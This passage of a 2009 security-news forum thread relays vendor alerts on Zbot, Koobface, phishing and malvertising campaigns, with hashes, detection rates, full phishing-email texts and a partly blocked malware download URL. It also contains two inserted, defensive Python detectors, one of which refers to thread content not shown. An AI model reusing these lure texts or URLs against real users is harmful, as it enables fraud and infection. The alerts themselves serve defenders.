09.21.2009 - "Websense... discovered a new spam campaign that is targeting players of the Monopoly game. The Monopoly World Championships take place every four years, and Las Vegas is the host city of 2009. Because the Monopoly Regional Championships are going on all over the world and many Monopoly enthusiasts take part, the spammers utilize this chance to play their tricks. Our email honeypot systems detected over 30 thousand Monopoly spam messages on September 21, 2009 alone. The spam uses a social networking technique to "invite" you to play the online board game. It then provides a link to the fake Monopoly game download site, which in fact downloads a Trojan..."
(Screenshots available at the URL above.)
:fear::mad::fear:
AplusWebMaster
2009-09-25, 17:21
FYI...
Malvertisements - weekend run...
- http://blog.scansafe.com/journal/2009/9/24/weekend-run-of-malvertisements.html
September 24, 2009 - "Between Sep 19-21, malicious banner ads were served via multiple popular sites, including drudgereport.com, lyrics.com, horoscope.com and slacker.com. The ads delivered a trojan downloader using a variety of Adobe PDF exploits as well as the Microsoft ActiveX DirectShow exploit described in MS09-032. Detection of the malicious PDF is quite low, with only 3 out of 41 scanners detecting, as seen in this VirusTotal report*... Attackers use online ads for the same reasons a legitimate company would do so. When an attacker can infiltrate an advertising network, it enables them to reach a broad number of websites within a chosen category. This provides the attacker with the same return on investment that it would a legitimate advertiser – broad exposure to the audience of their choosing..."
- http://www.theregister.co.uk/2009/09/24/malware_ads_google_yahoo/
24 September 2009 - "... They were delivered over networks belonging to Google's DoubleClick; Right Media's Yield Manager (owned by Yahoo); and Fastclick, owned by an outfit called ValueClick... the payload installed Win32/Alureon, a trojan that drops a backdoor on infected machines... also appeared on slacker.com ..."
- http://www.virustotal.com/analisis/6aca4742834c0b72b37907923b4c52589255f1bb1e29fe56f1ea5b376322023b-1253635686
File 201f338a343e02a41dc7a5344878b862 received on 2009.09.22 16:08:06 (UTC)
Current status: finished
Result: 3/41 (7.32%)
:mad:
AplusWebMaster
2009-09-28, 16:26
FYI...
Phishing attacks reach record levels in Q2 2009
- http://www.markmonitor.com/pressreleases/2009/pr090928-bji.php
September 28 2009 - "...
• During Q2 2009, phish attacks reached record levels with more than 151,000 unique attacks
• The average number of phishing attacks per organization also increased to record levels, with 351 attacks per organization, on average, in Q2 2009
• Social networking attacks continued to rise significantly, recording a 168% increase from the same period in 2008
• Brands in the financial and payment services industries are the most heavily-targeted industry categories for phishers, constituting 80 percent of all phish attacks in Q2 2009..."
:fear::fear:
AplusWebMaster
2009-10-02, 07:38
FYI...
Fraudsters on social networking sites
- http://www.ic3.gov/media/2009/091001.aspx
October 1, 2009 - "Fraudsters continue to hijack accounts on social networking sites and spread malicious software by using various techniques. One technique involves the use of spam to promote phishing sites, claiming there has been a violation of the terms of agreement or some other type of issue which needs to be resolved. Other spam entices users to download an application or view a video. Some spam appears to be sent from users' "friends", giving the perception of being legitimate. Once the user responds to the phishing site, downloads the application, or clicks on the video link, their computer, telephone or other digital device becomes infected. Another technique used by fraudsters involves applications advertised on social networking sites, which appear legitimate; however, some of these applications install malicious code or rogue anti-virus software. Other malicious software gives the fraudsters access to your profile and personal information. These programs will automatically send messages to your "friends" list, instructing them to download the new application too. Infected users are often unknowingly spreading additional malware by having infected Web sites posted on their Webpage without their knowledge. Friends are then more apt to click on these sites since they appear to be endorsed by their contacts..."
(Tips on avoiding these tactics available at the URL above.)
:fear::mad::fear:
AplusWebMaster
2009-10-13, 18:09
FYI...
SSL SPAM... w/Zbot
- http://isc.sans.org/diary.html?storyid=7333
Last Updated: 2009-10-13 13:13:34 UTC - "... started receiving SPAM messages along the following lines:
'On October 16, 2009 server upgrade will take place. Due to this the system may be offline for approximately half an hour. The changes will concern security, reliability and performance of mail service and the system as a whole. For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure. This procedure is quite simple. All you have to do is just to click the link provided, to save the patch file and then to run it from your computer location. That's all.
http ://evil-link/evil-file
Thank you in advance for your attention to this matter and sorry for possible inconveniences...'
UPDATE
the sample file we received was named patch.exe MD5=9abc553703f4e4fedb3ed975502a2c7a
ZBOT characteristics, so trojan, keylogger, disables AV.
http://www.threatexpert.com/report.aspx?md5=9abc553703f4e4fedb3ed975502a2c7a
"... Trojan-Spy.Zbot.YETH - Trojan-Spy.Zbot.YETH is a rootkit trojan which steals online banking information and downloads other malware as well..."
... ThreatExpert on the file... http://www.threatexpert.com/report.aspx?md5=174aeb93b8d642c2cddfd9c50b0015c9
"... Trojan-Spy.Zbot.YETH - Trojan-Spy.Zbot.YETH is a rootkit trojan which steals online banking information and downloads other malware as well..."
___
- http://blog.trendmicro.com/tailor-made-zbot-spam-campaign-targets-various-companies/
Oct. 14, 2009
:fear::fear:
AplusWebMaster
2009-10-14, 21:53
FYI...
New variation of SSL Spam
- http://isc.sans.org/diary.html?storyid=7357
Last Updated: 2009-10-14 18:25:16 UTC
"... update to a diary we did earlier this week. The body of the spam today is:
' Dear user of the <some company> mailing service!
We are informing you that because of the security upgrade of the mailing
service your mailbox (<user>@<some company>) settings were changed. In
order to apply the new set of settings click on the following link ... '
The email contains a link with a file to download. Some of the files we have seen are:
settings-file.exe MD5: 0244586f873a83d89caa54db00853205
settings-file2.exe MD5: e6436811c99289846b0532812ac49986
The files are being detected by some anti-virus software programs at this time as Zbot variants..."
:fear:
AplusWebMaster
2009-10-15, 02:42
FYI...
Outlook SPAM/Scam w/malware
- http://securitylabs.websense.com/content/Alerts/3491.aspx
10.14.2009 - "Websense... has discovered a new wave of malicious attacks claiming to be an update for Microsoft Outlook Web Access (OWA). Victims receive a message leading to a site to apply mailbox settings which were supposedly changed due to a "security upgrade." The especially dangerous thing about these messages is that they are very deceiving. The messages and attack pages are personalized for the To: email address to imply the message is being sent from tech support of the domain. The URL in the email looks like it leads to the company's own OWA system. We have seen upwards of 30,000 of these messages per hour and they have low AV detection*... The malicious site is also very believable. The victim's domain is used as a sub-domain to the site so that the attack site appears to be the victim's actual OWA site. The victim's domain name and email address are also used in a number of locations on the malicious site to make it that much more believable..."
* http://www.virustotal.com/analisis/e212d7e75478fa9ce4a8afbbd2e730a301f17fb2253567b72e00f59bf51a99b8-1255552077
File settings-file.exe received on 2009.10.14 20:27:57 (UTC)
Result: 6/41 (14.63%)
(Screenshots available at the Websense URL above.)
- http://www.us-cert.gov/current/#malware_circulating_via_spam_messages
October 15, 2009
:fear:
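The trick described in the Websense and ISC posts above (the victim's own domain used as a sub-domain of the attacker's site, so the link "looks like" the company's OWA server) recurs later in this thread with the CDC campaign's online.cdc.gov.[RANDOM CHARS].[TLD NAME].im hosts. As an added example, not code from Websense, ISC or any other source quoted here, the following Python flags URLs whose hostname embeds a trusted domain as a run of labels while the registrable domain is something else entirely. The tiny public-suffix table, the helper names and the sample hosts are assumptions made up for the example; production code should consult the real Public Suffix List.

```python
from typing import Iterable, Optional, Tuple
from urllib.parse import urlparse

# Constructed stand-in for the Public Suffix List, just enough for the example
# to run offline. Production code should load the real list instead.
MULTI_LABEL_SUFFIXES = {"co.uk", "org.uk", "gov.uk", "com.im", "org.im", "co.im"}


def hostname_of(url: str) -> str:
    """Pull the hostname out of a URL; tolerates bare hosts and the
    'http ://' defanging used in this thread."""
    cleaned = url.strip().replace("http ://", "http://").replace("https ://", "https://")
    if "://" not in cleaned:
        cleaned = "http://" + cleaned
    return (urlparse(cleaned).hostname or "").lower().rstrip(".")


def registrable_domain(host: str) -> str:
    """The part someone actually had to register: 'yhnbad.com.im' for
    'online.cdc.gov.yhnbad.com.im', 'evil.net' for 'example.com.evil.net'."""
    labels = host.split(".")
    if len(labels) < 2:
        return host
    if ".".join(labels[-2:]) in MULTI_LABEL_SUFFIXES and len(labels) >= 3:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def brand_embedded_elsewhere(url: str, trusted_domains: Iterable[str]) -> Optional[Tuple[str, str]]:
    """Return (trusted_domain, registrable_domain_of_host) when a trusted domain
    appears as consecutive labels inside a hostname that is NOT actually under
    that domain. Return None when the host is the trusted domain itself or a
    genuine subdomain of it."""
    host = hostname_of(url)
    if not host:
        return None
    labels = host.split(".")
    for trusted in trusted_domains:
        t = trusted.lower().rstrip(".")
        if host == t or host.endswith("." + t):
            continue  # genuine host under the trusted domain
        t_labels = t.split(".")
        n = len(t_labels)
        for i in range(len(labels) - n + 1):
            if labels[i:i + n] == t_labels:
                return (t, registrable_domain(host))
    return None


if __name__ == "__main__":
    # Constructed sample links; only the cdc.gov.*.im shape comes from the thread.
    for link in [
        "http://online.cdc.gov.yhnbad.com.im/profile",
        "https://online.cdc.gov/flu",
        "http://example.com.mail-settings-update.net/owa",  # victim domain as sub-domain
        "https://owa.example.com/",
    ]:
        print(link, "->", brand_embedded_elsewhere(link, ["cdc.gov", "example.com"]))
```

The check works on the URL's hostname, not on the link text the mail shows, which is the point: a mail-gateway or proxy rule should compare the registrable domain of every link against the brand names it contains, because the "personalized" sub-domain is exactly what makes these messages convincing.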
AplusWebMaster
2009-10-15, 14:03
FYI...
New Koobface campaign spoofs Adobe's Flash updater
- http://blogs.zdnet.com/security/?p=4594
October 14, 2009 - "Earlier this week, the botnet masters behind the most efficient social engineering driven botnet, Koobface, launched a new campaign currently spreading across Facebook with a new template spoofing Adobe’s Flash updater embedded within a fake Youtube page. The malware campaign is relying on compromised legitimate web sites, now representing 77% of malicious sites in general, and on hundreds of automatically registered Blogspot accounts with the CAPTCHA recognition process done on behalf of the users already infected by Koobface, compared to the gang’s previous reliance on commercial CAPTCHA recognition services..."
:fear:
AplusWebMaster
2009-10-16, 15:06
FYI...
Zbot SPAM campaign continues
- http://blog.trendmicro.com/zbot-spam-campaign-continues/
Oct. 16, 2009 - "A slightly modified Zbot spam campaign currently making the rounds pretends to come from the IT support of various companies. It informs users that a security update in the mailing service caused changes in their mailbox settings. They are instructed to open the ZIP attachment and run the .EXE file, INSTALL.EXE, to supposedly apply the changes. Trend Micro detects this as TROJ_FAKEREAN.CF. When executed, this Trojan accesses http ://{BLOCKED}nerkadosa.com /xIw1yPD0q5Gb8t0br4×6k5sk to download another malicious file detected as TROJ_FAKEREAN.BI... Spammers usually employ random email addresses in the FROM and TO field headers, but in this case the actual company domain is used as the email address in both fields. This is done to make the email message more credible, as if it came internally from the company, thus luring unknowing users into executing the malware... The said email purports to be a notification from the company’s “system administrator” to update the user’s system because of a server upgrade. Accordingly, the subdomains are tailor-made to make it look more legitimate. Users are encouraged not to open suspicious-looking emails even though they supposedly come from a trusted source. It is also advisable that users first contact their IT or tech support in case they receive such emails, to verify whether a security update has indeed occurred..."
(Screenshots available at the TrendMicro URL above.)
- http://atlas.arbor.net/
"... We are also seeing email spam attacks to spread malware from the Bredolab botnet, from the ZBot botnet, and a Rogue AV downloader purporting to be an anti-conficker system update."
:fear::fear:
AplusWebMaster
2009-10-22, 22:43
FYI...
Malicious update for Outlook/Outlook Express (KB910721)
- http://www.sophos.com/blogs/sophoslabs/v/post/7044
October 22, 2009 - "... Didn’t I see this a while ago and didn’t it contain a rather nasty Trojan? The format of the October version differs slightly in that it includes a link to a website from which you may download the ‘Microsoft/Outlook/Outlook Express Update’ rather than an attached executable. The details have also been updated... Of course this is not a Microsoft security update, but rather simply another attempt by the malware authors to fool you into installing their Trojan... Visit the genuine Microsoft update site* in order to obtain your fixes."
* http://update.microsoft.com/
:fear::fear:
AplusWebMaster
2009-10-27, 12:13
FYI...
Malicious Facebook password SPAM
- http://securitylabs.websense.com/content/Alerts/3496.aspx
10.26.2009 - "Websense... has discovered a new wave of malicious email attacks claiming to be a password reset confirmation from Facebook. The From: address on the messages is spoofed using support @ facebook.com to make the messages believable to recipients. The messages contain a .zip file attachment with an .exe file inside (SHA1: d01c02b331f47481a9ffd5e8ec28c96b7c67a8c6). The .exe file currently has a detection rate of about 30 percent on VirusTotal*. Our ThreatSeeker™ Network has seen up to 90,000 of these messages sent out so far today. The malicious exe file connects to two servers to download additional malicious files and joins the Bredolab botnet, which means the attackers have full control of the PC, allowing them to steal customer information and send spam emails. One of the servers is in the Netherlands and the other one in Kazakhstan..."
* http://www.virustotal.com/analisis/963f2e1769790ae402809e8f77275a219c67de414a7fbc13d687aa8070d5f10c-1256597978
File Facebook_Password_c92dd.exe received on 2009.10.26 22:59:38 (UTC)
Result: 12/41 (29.27%)
- http://www.symantec.com/connect/blogs/trojanbredolab-making-yet-another-comeback
October 27, 2009
(Screenshot available at the Websense and Symantec URLs above.)
First Facebook, now MySpace...
- http://www.m86security.com/trace/i/First-Facebook-now-MySpace,trace.1157~.asp
October 30, 2009
:fear::mad:
AplusWebMaster
2009-10-28, 11:08
FYI...
FDIC alert NOT...
- http://sunbeltblog.blogspot.com/2009/10/fdic-alert-not.html
October 27, 2009 - "Malicious SPAM. Don’t go there. Zeus Trojan..."
- http://ddanchev.blogspot.com/2009/10/ongoing-fdic-spam-campaign-serves-zeus.html
October 27, 2009
(Screenshots available at both URLs above.)
- http://www.fdic.gov/consumers/consumer/alerts/index.html
October 26, 2009 - "... This e-mail and associated Web site are fraudulent. Recipients should consider the intent of this e-mail as an attempt to collect personal or confidential information, some of which may be used to gain unauthorized access to on-line banking services or to conduct identity theft. The FDIC does -not- issue unsolicited e-mails to consumers..."
- http://blog.trendmicro.com/fdic-spam-points-to-info-stealer/
Oct. 27, 2009 - "... same cybercriminals responsible for other spam campaigns like the CapitalOne phishing attack and the Outlook update spam... characteristics of the domains (fast-flux and character patterns), URLs (wildcarded subdomains, long URLs), and binaries (Zeus) used in FDIC spam are somewhat similar to the above-mentioned spam waves..."
- http://www.us-cert.gov/current/#federal_deposit_insurance_corporation_warns
October 27, 2009
:fear::mad:
AplusWebMaster
2009-11-02, 18:08
FYI...
Worms return - MS SIR report...
- http://www.theregister.co.uk/2009/11/02/microsoft_security_report/
2 November 2009 - "Microsoft's latest security intelligence report* shows a resurgence in worms, although rogue security software also remains a big issue. Rogue security software was found and removed from 13.4m machines, compared to 16.8m last time. It is still an issue but numbers are falling. Worm figures doubled in the first six months of 2009 - from fifth to second. The focus on worms is partly to do with attention given to Conficker which infected 5.2m machines. Taterf doubled to 4.9m compared to the second half of 2008. Taterf is a worm aimed at massive multi-player games. It spreads via USB drives and mapped drives. Surprisingly it appears in enterprise space rather than consumer space - presumably by people sticking USB sticks into work machines... Cliff Evans, head of security and privacy at Microsoft, advised consumers to keep automatic updates on, keep a firewall running and use one of the newest browsers and up to date anti-malware. He said it was important to check all your software, not just Microsoft's... Microsoft works out the infection rate per thousand machines. The worldwide average is 8.7, Japan, Austria, Germany run at about 3 and the UK 4.9, down from 5.7. In the US the figure is 8.6. The top worm in the UK is koobface which spreads via Facebook and MySpace. It has been around a while but infection is increasing. Microsoft publishes this report every six months..."
* http://www.microsoft.com/security/portal/Threat/SIR.aspx
:fear::mad::fear:
AplusWebMaster
2009-11-03, 17:27
FYI...
Opachki hijacker trojan analysis
- http://www.secureworks.com/research/threats/opachki/
November 02, 2009 - "Opachki is one of many software tools developed by criminals to hijack and monetize Windows users' search traffic using affiliate-based search engines that are ultimately advertiser-sponsored, sometimes by well-known and respected firms. Each search-hijacking-by-malware scheme... so far seems to have a different twist, and the Opachki trojan is no different. Instead of only hijacking search result links, Opachki attempts to hijack as many links as it can on any web page, using the text enclosed by the HTML HREF tag as a faux search phrase when redirecting the user to an affiliate-based search engine. Opachki carries out this link hijacking using a small bit of JavaScript code that is injected into the top of HTML pages... Opachki demonstrates that even a "benign" threat such as a search/link hijacker has additional risks and costs that sometimes go unseen. For this reason, any trojan infection should be quickly resolved. Manual removal of Opachki is extremely difficult, given the many methods it uses to maintain its code on a system. Because of these difficulties and also because of other unknown trojans, worms or viruses Opachki may have downloaded, the recommended method of removal is to reformat and reinstall the operating system from known good media."
- http://isc.sans.org/diary.html?storyid=7519
Last Updated: 2009-11-03 12:46:11 UTC - "... prevents the system from booting in Safe Mode – the attackers did this to make it more difficult to remove the trojan. This goes well with what I've always been saying – do not try to clean an infected machine, always reimage it. As Opachki's main goal is to hijack links, it hooks the send and recv API calls in the following programs: FIREFOX.EXE, IEXPLORE.EXE, OPERA.EXE and QIP.EXE. While the first three are well known, I had to investigate the last one. It turned out that QIP.EXE is an ICQ client that is very popular in Russia, so the trojan has a component that directly attacks Russian users. The trojan will monitor web traffic (requests and responses) that the above-mentioned applications make and will inject a malicious script tag into every response..."
(More detail available at both URLs above.)
:mad::fear::mad:
AplusWebMaster
2009-11-05, 14:01
FYI...
FBI investigates $100 million in losses from spear phishing
- http://sunbeltblog.blogspot.com/2009/11/fbi-investigates-100-million-in-losses.html
November 04, 2009 - "The FBI has said it is investigating thefts in the last five years of more than $100 million from small and medium sized businesses that fell victim to spear-phishing attacks which siphoned funds from their bank accounts. There are more of the attacks reported each week, they said. The attacks typically involved malware sent by email that installed key loggers and targeted someone in the company who could initiate fund transfers. The criminals used the key loggers to capture the victim’s banking log-in information then initiated fund transfers to money mules, generally in amounts below $10,000 – the level that triggers currency transaction reporting. The mules transfer the funds to the criminals via Western Union or other international money transfer systems. The phishing emails were sent from groups or people known to the victims so they wouldn’t be inclined to consider them fraudulent. Among other measures, the FBI suggests removing the company organization chart from web sites in order to preclude spear-phishing emails that target company financial personnel...". Report here*.
* http://www.ic3.gov/media/2009/091103-1.aspx
November 3, 2009
:fear::fear:
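Both the Security Fix post on the school and university thefts earlier in this thread and the FBI/IC3 warning above describe the same cash-out pattern: many transfers kept just under $10,000 (the currency transaction reporting level) fanning out to a set of freshly recruited "money mule" accounts within a day or two. As an added example, not code from Security Fix, the FBI or any other source quoted here, the following Python sketches the kind of rule a bank or a business's own treasury team could run over outbound transfers to catch that shape. The threshold, the 10% band, the 48-hour window, the minimum of three distinct new payees and the sample ledger are all assumptions made up for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple, Set


class Transfer(NamedTuple):
    when: datetime
    account: str   # originating business account
    payee: str     # destination account / beneficiary id
    amount: float


def just_below(amount: float, threshold: float, margin: float) -> bool:
    """True when amount sits in the band [threshold*(1-margin), threshold)."""
    return threshold * (1.0 - margin) <= amount < threshold


def find_structured_batches(
    transfers: List[Transfer],
    known_payees: Dict[str, Set[str]],
    threshold: float = 10000.0,      # assumed reporting level
    margin: float = 0.10,            # assumed "just below" band: 9,000 to 9,999.99
    window: timedelta = timedelta(hours=48),
    min_count: int = 3,
) -> List[dict]:
    """One alert per originating account whose under-threshold transfers to
    never-before-seen payees cluster inside `window`. Known payees (payroll,
    regular suppliers) are ignored so ordinary business traffic does not fire."""
    candidates: Dict[str, List[Transfer]] = defaultdict(list)
    for t in transfers:
        new_payee = t.payee not in known_payees.get(t.account, set())
        if new_payee and just_below(t.amount, threshold, margin):
            candidates[t.account].append(t)

    alerts = []
    for account, items in candidates.items():
        items.sort(key=lambda t: t.when)
        best: List[Transfer] = []
        start = 0
        # sliding window over the sorted candidates; keep the largest batch
        for end in range(len(items)):
            while items[end].when - items[start].when > window:
                start += 1
            batch = items[start:end + 1]
            if len(batch) > len(best):
                best = batch
        distinct = {t.payee for t in best}
        if len(best) >= min_count and len(distinct) >= min_count:
            alerts.append({
                "account": account,
                "count": len(best),
                "distinct_payees": len(distinct),
                "total": round(sum(t.amount for t in best), 2),
                "first": best[0].when,
                "last": best[-1].when,
            })
    return alerts


def sample_transfers() -> List[Transfer]:
    """Constructed sample ledger (not real data)."""
    d = datetime(2009, 9, 10, 9, 0)
    return [
        Transfer(d,                       "ACME-OPS", "PAYROLL-VENDOR", 9800.00),  # known payee: ignored
        Transfer(d + timedelta(hours=1),  "ACME-OPS", "MULE-A", 9400.00),
        Transfer(d + timedelta(hours=2),  "ACME-OPS", "MULE-B", 9650.00),
        Transfer(d + timedelta(hours=5),  "ACME-OPS", "MULE-C", 9900.00),
        Transfer(d + timedelta(hours=20), "ACME-OPS", "MULE-D", 9850.00),
        Transfer(d + timedelta(hours=21), "ACME-OPS", "MULE-E", 12000.00),         # above threshold: ignored
        Transfer(d + timedelta(days=10),  "ACME-OPS", "MULE-F", 9500.00),          # outside the window, alone
        Transfer(d,                       "BETA-LLC", "NEW-SUPPLIER", 9500.00),    # single transfer: no alert
    ]


# Constructed list of payees each account has paid before.
KNOWN_PAYEES = {"ACME-OPS": {"PAYROLL-VENDOR"}, "BETA-LLC": set()}

if __name__ == "__main__":
    for alert in find_structured_batches(sample_transfers(), KNOWN_PAYEES):
        print(alert)
```

On the constructed ledger only ACME-OPS is flagged: four transfers of 9,400 to 9,900 to four new payees within 20 hours, for 38,800 in total. The 12,000 transfer and the lone transfer ten days later do not count, and BETA-LLC's single payment to a new supplier is below the minimum. The "new payee" condition is what carries the signal: the reports say the mules were recruited days earlier via job scams, so none of them has a payment history with the victim.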
AplusWebMaster
2009-11-09, 17:00
FYI...
Koobface abuses Google Reader pages
- http://blog.trendmicro.com/koobface-abuses-google-reader-pages/
Nov. 9, 2009 - "We are seeing another development from the Koobface botnet, this time abusing the Google-owned service Google Reader to spam malicious URLs in social networking sites such as Facebook, MySpace, and Twitter. The Koobface gang used controlled Google Reader accounts to host URLs containing an image that resembles a flash movie. These URLs are spammed through the said social networks. When the user clicks the image or the title of the shared content, it leads to the all too familiar fake YouTube page that hosts the Koobface downloader component... This sharing of content to the public is what the cybercriminals abused to use the Google Reader domain in spamming malicious links. We have already contacted Google about this matter to remove the malicious content. As of now we’ve found 1,300 Google Reader accounts used for this attack..."
(Screenshots available at the URL above.)
Malicious Google AppEngine Used as a CnC
- http://asert.arbornetworks.com/2009/11/malicious-google-appengine-used-as-a-cnc/
November 9, 2009
- http://www.f-secure.com/weblog/archives/00001815.html
November 9, 2009 - "... there are these apparent MySpace phishing e-mails going around ("...please be informed that you are required to update your MySpace account, Please update your MySpace account by clicking here..."). When you follow the link, you end up at this MySpace look-alike page, hosted on various .uk domains... Why do they want them? So they can pose as you on MySpace and send malicious links to your friends — who will surely follow them, as they know you and trust you. But in this case, this is not the only thing they are after. After logging on, you get this prompt... A New MySpace Update Tool? Really? As an executable file? Hmm… and of course it's not. The file (md5: 4c7693219eaa304e38f5f989a8346e51) turns out to be yet another Zeus / Zbot banking trojan variant..."
(Screenshots available at the F-secure URL above.)
Zeus Malware Moves to Myspace
- http://garwarner.blogspot.com/2009/11/zeus-malware-moves-to-myspace.html
November 09, 2009 - "... The newest campaign follows the model of last week's Facebook UpdateTool*, only now targeting MySpace users..."
* http://garwarner.blogspot.com/2009/10/facebook-phish-users-beware.html
October 28, 2009
:fear::mad:
AplusWebMaster
2009-11-14, 00:20
FYI...
Conficker patch via email - NOT
- http://isc.sans.org/diary.html?storyid=7591
Last Updated: 2009-11-13 20:16:53 UTC - "Microsoft does -not- send patches, updates, anti-virus, or anti-spyware via email (hopefully ever)... in my inbox this aft. The subject was: Conflicker.B Infection Alert
"Dear Microsoft Customer,
Starting 12/11/2009 the ‘Conficker’ worm began infecting Microsoft customers unusually rapidly. Microsoft has been advised by your Internet provider that your network is infected.
To counteract further spread we advise removing the infection using an antispyware program. We are supplying all effected Windows Users with a free system scan in order to clean any files infected by the virus.
Please install attached file to start the scan. The process takes under a minute and will prevent your files from being compromised. We appreciate your prompt cooperation.
Regards,
Microsoft Windows Agent #2 (Hollis)
Microsoft Windows Computer Safety Division"
* https://www.virustotal.com/analisis/5d8caa7c9baaed6242e3842e0dafea5056f41d9c99732f0fd2961bedff647ae5-1258134283
File 3YMH6JJY.zip received on 2009.11.13 17:44:43 (UTC)
Result: 11/41 (26.83%)
:fear::mad::fear:
AplusWebMaster
2009-11-14, 20:43
FYI...
Bogus ‘Balance Checker’ tool carries malware
- http://blog.trendmicro.com/bogus-balance-checker-tool-carries-malware/
Nov. 14, 2009 - "... received samples of spammed messages that purport to come from mobile phone companies Vodafone and Verizon Wireless. The email messages carry the subject “Your credit balance is over its limits” and inform users that their credit balance is due. To be able to review the payments, users should employ the balance checker tool attached to the email... When users open the attached .ZIP file, they won’t find any balance checker tool and instead will get a malicious file (balancechecker.exe) detected by Trend Micro as TSPY_ZBOT.SMP. TSPY_ZBOT.SMP steals online banking credentials such as usernames and passwords. This stolen information may be used by cybercriminals for other fraudulent activities. It also disables the Windows Firewall and has rootkit capabilities that make detection and removal difficult. Users are strongly advised not to open any suspicious-looking emails even if they come from a known source. It is also good to verify first any email coming from your mobile services provider, just to be sure whether it is legitimate or not..."
:fear::mad::fear:
AplusWebMaster
2009-11-16, 19:41
FYI...
Online criminals cash in on swine flu
- http://www.sophos.com/blogs/gc/g/2009/11/16/swine-flu-fears-making-millionaires-russian-hackers/
November 16, 2009 - "As the number of reported swine flu cases climbs, it's time a strong message was sent out against buying Tamiflu over the internet. Research published by Sophos* exposes the profit model of the Russian cybercriminals making millions of pounds from counterfeit Tamiflu. Panic-induced stockpiling by individuals who aren't officially classified as being at risk of contracting swine flu, and therefore anxious they won't receive Tamiflu from the NHS, will not only line cybercriminals' pockets with millions of pounds in cash but also grant them access to sensitive personal data to be used for other crimes... The criminal gangs working behind the scenes at fake internet pharmacies are putting their customers' health, personal information and credit card details at risk. They have no problem breaking the law to promote these websites, so you can be sure they'll have no qualms in exploiting your confidential data or selling you medications which may put your life in danger. If you think you need medication contact your real doctor, and stay away from quacks on the internet..."
* http://www.sophos.com/sophos/docs/eng/marketing_material/samosseiko-vb2009-paper.pdf
"... The ‘Canadian Pharmacy’ group now holds the number one position in the Spamhaus Top 10 spammers list... Searching for GlavMed’s support number reveals over 120,000 online pharmacy sites..."
:fear::mad::fear:
AplusWebMaster
2009-11-18, 15:07
FYI...
Payment Request SPAM contains malware
- http://blog.trendmicro.com/payment-request-spam-contains-malware/
Nov. 18, 2009 - "TrendLabs researchers received spammed messages purporting to have come from various companies such as eBay, J.P. Morgan Chase and Co., and Colgate-Palmolive, among others. The email bears the subject “Payment request from,” and informs users about a certain recorded payment request... The spammed message even gives users two options—to either ignore the email if the payment request has been made, or to download the attached .ZIP file and install the inspector module to decline the said payment request. If the user did not make any transaction, he/she still needs to download the attachment just to cancel the payment request. The attached .ZIP file is, of course, not an inspector module but an .EXE file (module.exe) detected by Trend Micro as TROJ_AGENTT.WTRA. Users are advised to be wary before opening -any- attached files even if they come from known sources. It is also best to verify emails you receive from any company first, just to be sure they are legitimate..."
(Screenshots available at the URL above.)
:mad:
AplusWebMaster
2009-11-21, 14:18
FYI...
FDA targets online pharmacy counterfeits
- http://www.theregister.co.uk/2009/11/20/fda_online_pharmacy_action/
20 November 2009 - "The US Food and Drug Administration said it has completed a sweep of illegal online pharmacies that targeted 136 websites that appeared to be illegally selling drugs to American consumers... Websites peddling Viagra, steroids and other pharmaceuticals have emerged as a major source of spam over the past few years. In addition to clogging inboxes, the sites can put customers' health at risk because the drugs are frequently counterfeits. According to a study released in August, almost 90 percent of online drugstores advertised on Microsoft's Bing search engine violated federal and state laws... The FDA said the notices* sent to service providers and registrars may give them grounds to terminate service to their customers."
* http://www.fda.gov/NewsEvents/Newsroom/PressAnnouncements/ucm191330.htm
> http://www.fda.gov/ForConsumers/ConsumerUpdates/ucm048396.htm
- http://forums.spybot.info/showpost.php?p=347295&postcount=174
:fear::mad:
AplusWebMaster
2009-11-26, 01:02
FYI...
SPAM/phish/malware Zbot all-in-one
- http://www.pcgenius.com/uncategorized/red-condor-warns-of-aggressive-malware-attack/
November 24, 2009 — "Email security experts at Red Condor issued a warning about the latest spam campaign that contains a phishing ploy and a malware threat. The email requests that recipients click on a link in the body of the email to update the “security mode” of their email box. Users that click on the link are taken to a web site that recommends that they update to the latest version of the Macromedia Flash Player by downloading “flashinstaller.exe.” The executable is actually a banking Trojan that is known to disable firewalls, steal sensitive financial data and provide hackers with remote access capabilities. The malware is more commonly known as Win32:Zbot-MGA (Avast), W32/Bifrost.C.gen!Eldorado (F-Prot), PWS-Zbot.gen.v (McAfee) or PWS:Win32/Zbot.gen!R (Microsoft). The spam campaign was detected late on November 20, 2009, and within the first six hours, Red Condor had blocked more than 500,000 emails..."
:fear:
AplusWebMaster
2009-11-27, 15:52
FYI...
Another ZBOT SPAM run
- http://blog.trendmicro.com/another-zbot-spam-run/
Nov. 27, 2009 - "... another ZBOT spam campaign. The emails bear subjects such as “your photos” and “some jerk has posted your photos.” They inform the recipients that someone has posted their photos without their permission on a site and has sent the link to their friends. The recipient is intended to believe that the “sender” is acting as a “good samaritan,” emailing the one who supposedly posted the said pictures. The URL, of course, points to a website that distributes a malware detected by Trend Micro as TSPY_ZBOT.CJA... When executed TSPY_ZBOT.CJA connects to several websites to download another malicious file detected as TROJ_DROPR.KB. The spyware also has rootkit capabilities that enable it to hide its processes. ZBOT/ZeuS is one of the most notorious botnets with regard to identity, financial, and information theft. Users are strongly advised not to open emails from unknown sources..."
(Screenshots available at the URL above.)
:fear::fear:
AplusWebMaster
2009-11-30, 17:10
FYI...
Koobface using Christmas theme
- http://securitylabs.websense.com/content/Alerts/3505.aspx
11.30.2009 - "Websense... has discovered that the Koobface malware campaign is now using a Christmas theme. Recent developments by Koobface have included use of Google Reader. The Koobface Web site offers a video posted by 'SantA'. The usual ruse of requiring a codec to watch the video is used, to encourage the user to install and run a file called setup.exe (SHA1:a2046fc88ab82abec89e150b915ab4b332af924a). This file is currently detected by 16 out of 41 antivirus products according to VirusTotal*. On the compromised Facebook page the user is presented with a link to ch[removed]cher .ch which is a compromised site in Switzerland. The user is -redirected- to one of several Koobface Web sites through a malicious Flash movie file hosted on the compromised site. If the user runs the infected file, the worm will automatically login to their Facebook, Myspace, and several other social networking sites and send messages to all their friends..."
* http://www.virustotal.com/analisis/59d6f355cfeba6684dd03954e84615cbb79def11e40b1f69cd4275645b8e48af-1259587988
File setup.exe received on 2009.11.30 13:33:08 (UTC)
Result: 16/41 (39.02%)
(Screenshots available at the Websense URL above.)
:fear::mad:
AplusWebMaster
2009-12-02, 13:31
FYI...
Zeus bot SPAM fakes CDC request
- http://www.symantec.com/connect/blogs/zeus-trojan-catches-swine-flu
